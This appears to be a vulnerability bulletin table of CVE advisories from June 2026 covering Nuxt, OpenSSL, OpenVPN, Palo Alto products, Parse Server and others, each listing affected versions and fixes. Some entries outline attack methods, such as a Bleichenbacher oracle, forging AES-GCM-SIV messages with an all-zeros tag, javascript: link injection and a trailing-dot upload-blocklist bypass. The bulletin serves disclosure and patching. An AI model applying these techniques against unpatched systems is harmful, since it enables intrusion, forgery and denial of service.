| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In Nuxt versions 3.11.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6 and @nuxt/nitro-server versions 3.20.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6, when experimental.componentIslands is enabled (default in Nuxt 4), any .server.vue file under pages/ is automatically registered as a server island under the key page_<routeName> and exposed via the /__nuxt_island/:name endpoint. Until this fix, requests through that endpoint rendered the page component directly via the SSR renderer without instantiating Vue Router, which meant route middleware declared on the page (including definePageMeta({ middleware })) did not run. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-47200 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In @nuxt/rspack-builder and @nuxt/webpack-builder from versions 3.15.4 to before 3.21.7 and 4.0.0 to before 4.4.7, there is an incomplete fix for GHSA-6m52-m754-pw2g. Source code may still be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network. This issue has been patched in versions 3.21.7 and 4.4.7. | 2026-06-12 | not yet calculated | CVE-2026-49993 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. From versions 3.11.0 to before 3.21.7 and 4.0.0 to before 4.4.7, there is a route-rule middleware bypass via case-sensitivity mismatch between vue-router and the routeRules matcher. This issue has been patched in versions 3.21.7 and 4.4.7. | 2026-06-12 | not yet calculated | CVE-2026-53721 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. Prior to versions 3.21.7 and 4.4.7, <NuxtLink> did not validate the URL scheme of values bound to its to or href props before rendering them into the href attribute of the underlying <a> element. When an application binds attacker-controlled input (a query parameter, a CMS field, a user-supplied profile URL) to <NuxtLink :to> or :href, the attacker can supply a javascript: or vbscript: URL that is reflected verbatim into the rendered markup. Clicking the link executes the supplied script in the origin of the Nuxt application, resulting in reflected DOM-based cross-site scripting. A data:text/html,... payload reflected through the same sink does not execute in the application's origin but enables a same-tab phishing surface anchored to a legitimate application link. The same value was exposed to consumers of the component's custom slot via the href and route.href props, so applications that re-bind those values to their own anchors were affected identically. This issue has been patched in versions 3.21.7 and 4.4.7. | 2026-06-12 | not yet calculated | CVE-2026-53722 |
| OpenSSL--OpenSSL | Issue summary: Parsing a crafted DER-encoded ASN.1 structure with a primitive element whose content exceeds 2 gigabytes in length may cause a heap buffer over-read on 64-bit Unix and Unix-like platforms. Impact summary: The heap buffer over-read may crash the application (Denial of Service) or load into the decoded ASN.1 object the contents of memory beyond the end of the input buffer. More typically such ASN.1 elements would instead be truncated. An integer truncation in OpenSSL's ASN.1 decoder causes the content length of an ASN.1 primitive element to be mishandled when it exceeds 2 gigabytes. In the worst case the truncated length is treated as a request to scan the binary content for a terminating zero byte, possibly causing OpenSSL to read either less than or beyond the end of the allocated buffer. Applications that pass attacker-supplied data to d2i_X509(), d2i_PKCS7(), or any other d2i_* decoding function are affected. OpenSSL's own command-line tools are not vulnerable, as data read through the BIO layer is checked before it reaches the affected code. The issue only affects 64-bit Unix and Unix-like platforms; 32-bit platforms and 64-bit Windows are not affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-34180 |
| OpenSSL--OpenSSL | Issue Summary: The PKCS#12 file processing fails to perform sufficient input validation for files that use Password-Based Message Authentication Code 1 (PBMAC1) integrity mechanism allowing a certificate and private key forgery. Impact Summary: An attacker impersonating a user can cause a service reading PKCS#12 files to accept forged certificates and private keys with a 1 in 256 probability. If a service accepting PKCS#12 files is using passwords for authenticating the received files, the attacker can create unencrypted PKCS#12 files that use PBMAC1 authentication that specifies an HMAC key of only one byte, allowing them to craft a file that will be accepted with a 1 in 256 probability. That would then cause the service to accept a certificate and private key controlled by the attacker. The FIPS modules are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-34181 |
| OpenSSL--OpenSSL | Issue Summary: Cryptographic Message Services (CMS) processing fails to perform sufficient input validation on the cipher and tag length fields of AuthEnvelopedData containers, leading to various potential compromises. Impact Summary: Attackers making use of these vulnerabilities may achieve key-equivalent functionality for a given CMS recipient and/or bypass integrity validation for a given message. In one use case, an attacker may send a CMS message containing AuthEnvelopedData with the cipher specified as a non-AEAD cipher. OpenSSL erroneously allows this selection, and attempts to decrypt and validate the message. An on-path attacker who captures one legitimate AES-GCM AuthEnvelopedData addressed to the victim can re-emit it with the recipientInfos set left byte-for-byte intact, so the victim's private key still unwraps the genuine CEK (the content-encryption key), but with the inner OID rewritten to AES-256-OFB (Output Feedback Mode, an unauthenticated keystream mode) and with an attacker-chosen IV and ciphertext. The victim initializes AES-256-OFB under the real CEK, never consults the MAC field, and CMS_decrypt() returns success. If the application under attack responds to the attacker with any indicator showing success or failure of the decryption effort, it is possible for the attacker to use this as an oracle to obtain key equivalent functionality for the CEK used for the chosen recipient of the message. In another use case, an attacker can reduce the tag length of the chosen AEAD cipher for a given AuthEnvelopedData container to be a single byte long, allowing an attacker to brute force CMS decryption, producing an integrity bypass for applications that trust CMS_decrypt() to reject modified content. The FIPS modules are not affected by this issue. | 2026-06-09 | not yet calculated | CVE-2026-34182 |
| OpenSSL--OpenSSL | Issue summary: Remote peer may exhaust heap memory of the QUIC server or client by flooding it with packets containing PATH_CHALLENGE frames. Impact summary: A malicious remote peer can cause an unbounded memory allocation which can lead to an abnormal termination of the application acting as a QUIC client or server and a Denial of Service. A remote peer may exhaust heap memory by flooding the local QUIC stack with PATH_CHALLENGE frames. The local QUIC stack allocates a PATH_RESPONSE frame for every PATH_CHALLENGE it receives. The allocated PATH_RESPONSE frame gets freed only when the remote peer acknowledges reception of the PATH_RESPONSE frame which will not be done by a malicious peer. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue. The QUIC stack is outside of OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-34183 |
| OpenSSL--OpenSSL | Issue summary: A malicious server can exploit TLS OCSP stapling by delivering a crafted response through the status_request extension, triggering a double-free in the client's certificate verification path. Impact summary: Successful exploitation allows an attacker to corrupt heap memory via a double-free, potentially leading to a Denial of Service or possibly an attacker controlled code execution or other undefined behavior. If OCSP stapling is enabled and the TLS client connects to a malicious server, a crafted OCSP stapled response can trigger a double free in the TLS client when the stapled response is checked. The OCSP stapling is not enabled by default. Reliable code execution through a double-free is technically complex and highly environment-dependent but the Denial of Service impact is straightforward to achieve, warranting Moderate severity. No FIPS modules are affected by this issue as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-35188 |
| OpenSSL--OpenSSL | Issue summary: Receiving a QUIC initial packet with an invalid token may trigger a NULL pointer dereference in the OpenSSL QUIC server with address validation disabled. Impact summary: NULL pointer dereference typically causes abnormal termination of the affected QUIC server process and a Denial of Service. If the address validation is disabled in the OpenSSL QUIC server implementation, an attacker can crash the server by sending an initial packet with an invalid or expired token. By default, the client address validation is enabled in the OpenSSL QUIC server implementation, which makes the default configuration not vulnerable to this issue. However if the SSL_LISTENER_FLAG_NO_VALIDATE is used with the SSL_new_listener() call, the address validation is disabled making the vulnerable code reachable. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42764 |
| OpenSSL--OpenSSL | Issue summary: When a partial-chain certificate verification is enabled together with OCSP response checking for the whole chain, a NULL dereference will happen if the verified chain does not have a self-signed trusted anchor, crashing the process. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When performing OCSP response checking for certificates in the verification chain, the code always tries to access the next certificate as the issuer. There is a check for a self-signed certificate. However with the partial chain verification enabled when the chain does not have a self-signed trusted anchor, the issuer will be NULL for the last certificate in the chain. A NULL pointer dereference then happens. This issue affects only applications which enable both OCSP verification of the certificate chain (X509_V_FLAG_OCSP_RESP_CHECK_ALL) and partial chain verification (X509_V_FLAG_PARTIAL_CHAIN) in the certificate verification. Both flags are disabled by default. For that reason, we have assigned Low severity to the issue. No FIPS modules are affected by this issue as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42765 |
| OpenSSL--OpenSSL | Issue summary: A specially crafted password-encrypted CMS message can trigger a NULL pointer dereference during CMS decryption. Impact summary: This NULL pointer dereference leads to an application crash and a Denial of Service. The CMS PasswordRecipientInfo.keyDerivationAlgorithm field is defined as OPTIONAL in the ASN.1 specification and may therefore be absent in specially crafted inputs. During the password-based CMS decryption the OpenSSL CMS implementation dereferences this field without first checking whether it was present. An attacker who supplies such a CMS message to an application performing password-based CMS decryption can trigger an application crash, leading to a Denial of Service. Applications that process password-encrypted CMS messages may be affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42766 |
| OpenSSL--OpenSSL | Issue summary: An attacker-controlled CMP (Certificate Management Protocol) server could trigger a NULL pointer dereference in a CMP client application. Impact summary: A NULL pointer dereference causes a crash of the application and a Denial of Service. An attacker controlling a CMP server (or acting as a man-in-the-middle) could craft a CMP response containing a CRMF (Certificate Request Message Format) CertRepMessage with an EncryptedValue structure where the symmAlg field has an algorithm OID but no parameters field. When the OpenSSL CMP client processes this response, the NULL dereference occurs, causing a crash of the CMP client. Applications that process untrusted CMP/CRMF messages may be affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42767 |
| OpenSSL--OpenSSL | Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to Bleichenbacher-style attack when an attacker is able to provide the CMS or S/MIME messages and observe the error code and/or decryption output. Impact summary: The Bleichenbacher-style attack allows an attacker to use the victim's vulnerable application as a way to decrypt or sign messages with the victim's private RSA key. The attack is possible in 2 variants. 1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without providing the recipient certificate. In this case OpenSSL iterates over every KeyTransRecipientInfo (KTRI) without stopping at the first success. An attacker who authors a message with two KTRI entries - the first one wrapping a real CEK under the victim's public key, the second with an arbitrary probe ciphertext - obtains opportunity to iterate the 2nd KTRI to get a valid PKCS#1 v1.5 padding if the error code of the application is available. That is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an adaptive-chosen-ciphertext side channel from which the attacker decrypts any RSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under it. 2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with the recipient certificate, and the recipient is not found, a random key is substituted. An attacker who authors a message and is able to compare both error code and the result of the decryption, can mount a Bleichenbacher oracle. We are not aware of any applications that provide a remote attacker an opportunity to mount an attack described in these scenarios. We consider the existence of such application very unlikely, and for this reason this CVE has been evaluated as Low severity. To avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the invoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described in draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit rejection was explicitly disabled. The implicit rejection mechanism always returns a plaintext value, the symmetric key. This result is deterministic for the ciphertext and the private key. The length of the decryption result can happen to match the length of the key of the symmetric cipher that was used for the content encryption. When a certificate is not provided, the last RecipientInfo producing a key that looks valid will be used. It may cause getting garbage content on decryption. As a proper way to deal with this a recipient certificate has to be provided to identify the particular RecipientInfo for decryption. The FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as CMS and S/MIME processing happens outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42768 |
| OpenSSL--OpenSSL | Issue Summary: An error in the callback used to verify the certificate provided in a Root CA key update Certificate Management Protocol (CMP) message response rendered the certificate validation ineffectual, which could lead to escalation of credentials from the Registration Authority (RA) level to the root Certification Authority (root CA) level. Impact Summary: The Registration Authority could replace the root CA certificate for the CMP clients with an arbitrary root CA certificate. One of the parts of the Certificate Management Protocol (CMP), specified in RFC 9810, is Root Certification Authority (root CA) key Rollover, which is sent by the server in a message with type 'id-it-rootCaKeyUpdate'. As part of these messages, the 'newWithOld' certificate, the new root CA certificate signed with the old root CA key, is provided, and verifying its signature is crucial for transferring the trust from the old CA key to the new one. The 'id-it-rootCaKeyUpdate' messages are expected to be processed with OSSL_CMP_get1_rootCaKeyUpdate(), which is expected to verify the 'newWithOld' certificate. A typo in the certificate chain building code led to adding an incorrect certificate ('newWithOld' instead of 'oldRoot') to the certificate chain, rendering the certificate verification process ineffectual (only the issuer name and the algorithm OIDs were verified by other parts of the verification code). An attacker who already has credentials that satisfy the CMP message protection checks can generate a new key pair and use a crafted self-signed certificate in its 'id-it-rootCaKeyUpdate' CMP messages which affected CMP clients would accept as a new trust anchor. Significant preconditions for the attack (having valid RA-level credentials) are the reason the issue was assigned Low severity. The FIPS modules are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42769 |
| OpenSSL--OpenSSL | Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the peer key is not properly checked for the subgroup membership. Impact summary: A malicious peer which presents an X9.42 key carrying the victim's p and g parameters, a forged q = r (a small prime factor of the cofactor (p−1)/q_local), and a public value Y of order r can recover the victim's private key after a small number of key exchange attempts. When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the subgroup membership check Y^q ≡ 1 (mod p) is performed using the peer's own q parameter, not the local key's q. The peer's domain parameters are then matched against the domain parameters of the private key, but the value of q is not compared. A malicious peer who presents an X9.42 key carrying the victim's p, g, a forged q = r (a small prime factor of the cofactor), and a public value Y of order r passes all checks. The shared secret then takes only r distinct values, leaking priv mod r. Repeating for each small-prime factor of the cofactor and combining via CRT recovers the full private key (Lim-Lee / small-subgroup-confinement attack). The realistic attack surface is narrow: principally CMP deployments with long-lived RA/CA DHX keys and bespoke enterprise or government applications using X9.42 DHX static keys with interactive protocols and therefore this issue was assigned Low severity. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are affected by this issue. | 2026-06-09 | not yet calculated | CVE-2026-42770 |
| OpenSSL--OpenSSL | Issue summary: When X509_VERIFY_PARAM_set1_email is called by an application to validate a crafted e-mail address, such as during S/MIME message validation, an out-of-bounds read can happen. Impact summary: This out-of-bounds read will not directly exfiltrate the data read to the attacker, so the most likely result is a crash and a Denial of Service. An internal helper function called from X509_VERIFY_PARAM_[set|add]_email() used a wrong length when validating the local part of an email address. This could cause the 64 octet limit on the local part of an email address to not be enforced, or cause an out-of-bounds read and potentially a crash. The bug is reachable via S/MIME validation with a crafted From: address supplied in an email message, which can potentially cause a crash. No FIPS modules are affected by this issue as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42771 |
| OpenSSL--OpenSSL | Issue summary: When an application drives an AES-OCB context through the public EVP_Cipher() one-shot interface, the application-supplied initialisation vector (IV) is silently discarded. Impact summary: Every message encrypted under the same key uses the same effective nonce regardless of the IV supplied by the caller, resulting in (key, nonce) reuse and loss of confidentiality. If the same code path is used to compute the authentication tag, the tag depends only on the (key, IV) pair and not on the plaintext or ciphertext, allowing universal forgery of arbitrary ciphertext from a single captured message. OpenSSL provides two ways to drive a cipher: the documented streaming interface (EVP_CipherUpdate / EVP_CipherFinal_ex) and a lower-level one-shot, EVP_Cipher(), whose documentation explicitly recommends against use by applications in favour of EVP_CipherUpdate() and EVP_CipherFinal_ex(). The OCB provider's streaming handler flushes the application-supplied IV into the OCB context before processing data; the one-shot handler did not. Every call to EVP_Cipher() on an AES-OCB context therefore ran with the all-zero key-derived offset state left by cipher initialisation, regardless of the caller's IV. If EVP_EncryptFinal_ex() is subsequently used to obtain the authentication tag, the deferred IV setup runs at that point and clears the running checksum that should have been accumulated over the plaintext. The resulting tag is a function of (key, IV) only and verifies against any ciphertext produced under the same (key, IV) pair. The OpenSSL SSL/TLS implementation is not affected: AES-OCB is not a TLS cipher suite, and libssl does not call EVP_Cipher() in any case. Applications that drive AES-OCB through the documented streaming AEAD API (EVP_CipherUpdate / EVP_CipherFinal_ex) are not affected. Only applications that combine the AES-OCB cipher with the EVP_Cipher() one-shot API are vulnerable. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as AES-OCB is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-45445 |
| OpenSSL--OpenSSL | Issue summary: The implementations of AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) mishandle the authentication of AAD (Additional Authenticated Data) with an empty ciphertext, allowing a forgery of such messages. Impact summary: An attacker can forge empty messages with arbitrary AAD to the victim's application using these ciphers. AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) are nonce-misuse-resistant AEAD modes: they accept a key, nonce, optional AAD (bytes that are authenticated but not encrypted), and plaintext, and produce ciphertext plus a 16-byte tag. On decrypt, `EVP_DecryptFinal_ex()` is documented to return success only if the tag is verified successfully. In OpenSSL's provider implementation of these ciphers, the expected tag is computed only when the decryption function is invoked with non-empty data. If the caller supplies AAD and then calls `EVP_DecryptFinal_ex()` without invoking the ciphertext update, which can happen when the received ciphertext length is zero, the tag is never recalculated and still holds its all-zeros value. When AES-GCM-SIV is used, an attacker who sends arbitrary AAD, empty ciphertext, and an all-zeros tag passes authentication under any key they do not know, single-shot. When AES-SIV is used, mounting the attack requires the application to reuse the decryption context without resetting the key. AES-SIV is implemented since OpenSSL 3.0. AES-GCM-SIV is implemented since OpenSSL 3.2. No protocols implemented in OpenSSL itself (TLS/CMS/PKCS7/HPKE/QUIC) support either AES-GCM-SIV or AES-SIV. To mount an attack, the applications must implement their own protocol and use the EVP interface. Also they must skip the ciphertext update when a message with an empty ciphertext arrives. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as these algorithms are not FIPS approved and the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-45446 |
| OpenSSL--OpenSSL | Issue summary: A specially crafted PKCS#7 or S/MIME signed message could trigger a use-after-free during PKCS#7 signature verification. Impact summary: A use-after-free may result in process crashes, heap corruption, or potentially remote code execution. When processing a PKCS#7 or S/MIME signed message, if the SignedData digestAlgorithms field is present as an empty ASN.1 SET, OpenSSL may incorrectly free a caller-owned BIO during PKCS7_verify(). A subsequent use of the BIO by the calling application results in a use-after-free condition. In the common case this occurs when the application later calls BIO_free() on the BIO originally passed to PKCS7_verify(). Depending on allocator behavior and application-specific BIO usage patterns, this may result in a crash or other memory corruption. In some application contexts this may potentially be exploitable for remote code execution. Applications that process PKCS#7 or S/MIME signed messages using OpenSSL PKCS#7 APIs may be affected. Applications using the CMS APIs for this processing are not affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-45447 |
| OpenSSL--OpenSSL | Issue summary: A signed integer overflow when sizing the destination buffer for Unicode output in ASN1_mbstring_ncopy() can lead to a heap buffer overflow. Impact summary: A heap buffer overflow may lead to a crash or possibly attacker controlled code execution or other undefined behaviour. In ASN1_mbstring_copy() and ASN1_mbstring_ncopy() the destination size for Unicode output is computed in a signed int: by left shift of the input character count for BMPSTRING (UTF-16) and UNIVERSALSTRING (UTF-32), and by summing per-character byte counts for UTF8STRING. The calculation overflows when the input reaches around 2^30 characters. In the worst case (UNIVERSALSTRING at 2^30 characters) the size wraps to zero, OPENSSL_malloc(1) is called, and the subsequent character copy writes several gigabytes past the one-byte allocation. X.509 certificate processing routes through ASN1_STRING_set_by_NID(), whose DIRSTRING_TYPE mask excludes UNIVERSALSTRING and whose per-NID size limits cap the input length; no network protocol or certificate-handling path in OpenSSL exercises the overflow. Triggering the bug requires an application that calls ASN1_mbstring_copy() or ASN1_mbstring_ncopy() directly, or registers a custom string type via ASN1_STRING_TABLE_add(), with attacker-controlled input on the order of half a gigabyte or more. For these reasons this issue was assigned Low severity. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-7383 |
| OpenSSL--OpenSSL | Issue summary: When CMS password-based decryption (RFC 3211 / PWRI key unwrap) processes attacker-supplied CMS data, an attacker-chosen stream-mode KEK cipher can trigger a heap out-of-bounds read in kek_unwrap_key(). Impact summary: A heap buffer over-read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not revealed to the attacker. The key unwrapping function performs a check-byte test as specified in the RFC that reads 7 bytes from a heap allocation that is based on the wrapped key length from the message. There is a minimum length check based on the block length of the wrapping cipher. However the cipher is selected from an OID carried in the attacker's PWRI keyEncryptionAlgorithm with no requirement that the cipher be a block cipher. When an attacker selects a stream-mode cipher the guard will be ineffective and the allocated buffer containing the unwrapped key can be too small to fit the check-bytes specified in the RFC and a buffer over-read can happen. Applications calling CMS_decrypt() or CMS_decrypt_set1_password() (equivalently openssl cms -decrypt -pwri_password ...) on untrusted CMS data are vulnerable to this issue. No password knowledge is required: the over-read happens during the unwrap attempt before any authentication succeeds. The over-read is limited to a few bytes and is not written to output, so there is no information disclosure. Triggering a crash requires the allocation to border unmapped memory, which is unlikely with the normal allocator. The FIPS modules are not affected by this issue. | 2026-06-09 | not yet calculated | CVE-2026-9076 |
| openvm-org--openvm | OpenVM is a performant and modular zkVM framework built for customization and extensibility. Prior to version 1.6.0, the openvm-pairing guest library's try_honest_pairing_check function invokes Theorem 3 of https://eprint.iacr.org/2024/640.pdf but does not check that the scaling factor s is in a proper subfield of Fp12. This allows incorrect results to the pairing check. This issue has been patched in version 1.6.0. | 2026-06-10 | not yet calculated | CVE-2026-46669 |
| OpenVPN--OpenVPN | Improper validation of packet length during tls-crypt-v2 key extraction in OpenVPN 2.6.0 through 2.6.19 and 2.7_alpha1 through 2.7.1 allows authenticated attackers to trigger a fatal assertion and cause a denial of service via a specially crafted packet. | 2026-06-08 | not yet calculated | CVE-2026-35058 |
| OpenVPN--OpenVPN | A race condition in OpenVPN 2.6.0 through 2.6.19 and 2.7_alpha1 through 2.7.1 allows remote attackers to potentially cause a server crash or leak heap memory via a use-after-free triggered during TLS session promotion. | 2026-06-08 | not yet calculated | CVE-2026-40215 |
| OpenVPN--ovpn-dco-win | An incorrect buffer size calculation in the epoch key generator in OpenVPN ovpn-dco-win version 2.0.0 through 2.8.3 allows a remote authenticated peer to trigger a heap-based buffer overflow and kernel memory corruption via a crafted data packet, resulting in a system crash (denial of service). | 2026-06-10 | not yet calculated | CVE-2026-11604 |
| Oracle Corporation--OracleLinux(7.2) shim | Multiple Microsoft-signed UEFI SHIM bootloaders are vulnerable to Secure Boot bypass. An attacker with administrative privileges or the ability to modify the boot process could use one of the vulnerable shim bootloaders to bypass Secure Boot protections and execute arbitrary code before the operating system loads. A specific UEFI DBX update is required to block these vulnerable boot loaders. | 2026-06-09 | not yet calculated | CVE-2026-8863 |
| OS4ED--openSIS-Classic | openSIS Classic 9.3 contains an insecure direct object reference vulnerability in the messaging module. Any authenticated user with access to the messaging module can request sent-message details from modules/messaging/SentMail.php by supplying an arbitrary mail_id value. | 2026-06-11 | not yet calculated | CVE-2026-8406 |
| Palo Alto Networks--Cloud NGFW | A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS® software enables a malicious authenticated administrator to store a JavaScript payload using the web interface. This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW and Prisma® Access are not affected by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0266 |
| Palo Alto Networks--Cloud NGFW | A memory corruption vulnerability in the processing of tunnel traffic in Palo Alto Networks PAN-OS® software allows an authenticated user to initiate system reboots using a maliciously crafted packet. Repeated attempts to initiate a reboot causes the firewall to enter maintenance mode. Panorama, Cloud NGFW, and Prisma® Access are not impacted by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0269 |
| Palo Alto Networks--Cloud NGFW | A privilege escalation vulnerability in Palo Alto Networks PAN-OS® software allows an authenticated administrator with access to the Command Line Interface (CLI) to perform actions on the device with root privileges. The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators and by restricting access to the management interface to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW, and Prisma® Access are not impacted by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0272 |
| Palo Alto Networks--Cloud NGFW | A command injection vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to bypass system restrictions and run arbitrary commands as a root user. To be able to exploit this issue, the user must have access to the PAN-OS CLI or Web UI. The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators and by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW and Prisma® Access are not affected by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0273 |
| Palo Alto Networks--Cortex XSIAM CommvaultSecurityIQ Marketplace | An improper validation of credentials vulnerability in the CommvaultSecurityIQ integration for Cortex XSOAR and Cortex XSIAM allows an unauthenticated attacker to access and modify protected resources. | 2026-06-10 | not yet calculated | CVE-2026-0274 |
| Palo Alto Networks--Cortex XSOAR | A path traversal vulnerability in Palo Alto Networks Cortex XSOAR engine software running on Linux allows an unauthenticated attacker on an adjacent network, with the ability to intercept and manipulate network response traffic via a man-in-the-middle (MITM) attack, to write arbitrary files to the host. | 2026-06-10 | not yet calculated | CVE-2026-0270 |
| Palo Alto Networks--GlobalProtect App | An information exposure vulnerability in the Palo Alto Networks GlobalProtect app on macOS enables a local user to learn the configured passcodes for disabling, disconnecting, or uninstalling the GlobalProtect app. After the passcode is known, the user can perform these actions even if the GlobalProtect app configuration would not normally permit them to do so. | 2026-06-10 | not yet calculated | CVE-2026-0267 |
| Palo Alto Networks--Prisma Access Agent | A security control bypass vulnerability in Prisma Access Agent for Linux allows a local attacker to route network traffic outside the VPN tunnel. This does not impact Prisma Access Agent on Windows, macOS, iOS, Android, or ChromeOS. | 2026-06-10 | not yet calculated | CVE-2026-0268 |
| Palo Alto Networks--Prisma Access Agent | A privilege escalation (PE) vulnerability in the Palo Alto Networks Prisma Access Agent app on Linux devices enables a local user to execute code with elevated privileges. This does not impact Prisma Access Agent on Windows, macOS, iOS, Android, or ChromeOS. | 2026-06-10 | not yet calculated | CVE-2026-0271 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.77 and 9.9.1-alpha.1, an unauthenticated attacker who knows a publicly-known Parse Application ID can submit a single HTTP request whose client SDK version field contains adversarial input that triggers polynomial backtracking in a request-header parser. The parsing runs before session authentication and before rate limiting on every /parse/* request, so the request consumes seconds to minutes of synchronous CPU on a Node.js worker before any access control evaluates it. A small number of concurrent requests can saturate a worker; a single large request via the body-field variant can pin a worker for minutes. Production deployments running the default configuration are affected. This issue has been patched in versions 8.6.77 and 9.9.1-alpha.1. | 2026-06-12 | not yet calculated | CVE-2026-47138 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.78 and 9.9.1-alpha.2, Parse Server's GraphQL endpoint discloses schema metadata to unauthenticated callers through Did you mean ...? suggestions embedded in GraphQL validation-error messages. An unauthenticated caller who knows only the public application id can iteratively send malformed queries to reconstruct class names, field names, argument names, mutation names, and input-object fields. This issue has been patched in versions 8.6.78 and 9.9.1-alpha.2. | 2026-06-12 | not yet calculated | CVE-2026-47248 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. From version 9.8.0 to before version 9.9.1-alpha.3, the routeAllowList server option restricts external client access to a configured list of REST API routes. The check is only enforced as Express middleware against the outer HTTP request URL, so the /batch handler dispatches each sub-request to the internal router without re-running the allow-list check. An external caller whose outer route matches batch can issue batch sub-requests to any REST API route that the operator omitted from the allow-list. Authentication, ACL, CLP, and other inner-route authorization controls still apply - only the operator-configured route firewall is bypassed. This issue has been patched in version 9.9.1-alpha.3. | 2026-06-12 | not yet calculated | CVE-2026-50008 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.79 and 9.9.1-alpha.4, the default file upload extension blocklist can be bypassed by appending a trailing dot to a filename whose extension would otherwise be blocked (e.g. poc.svg.). The trailing dot causes the extension parser to extract an empty string, which short-circuits the blocklist check, and the attacker-controlled Content-Type is forwarded to the storage adapter unchanged. Storage adapters that persist and serve the provided Content-Type (such as S3 or GCS) then serve the file with an active type such as image/svg+xml, enabling stored XSS when a victim opens the file URL. The default GridFS adapter is not affected because it sets X-Content-Type-Options: nosniff on responses. This issue has been patched in versions 8.6.79 and 9.9.1-alpha.4. | 2026-06-12 | not yet calculated | CVE-2026-53724 |
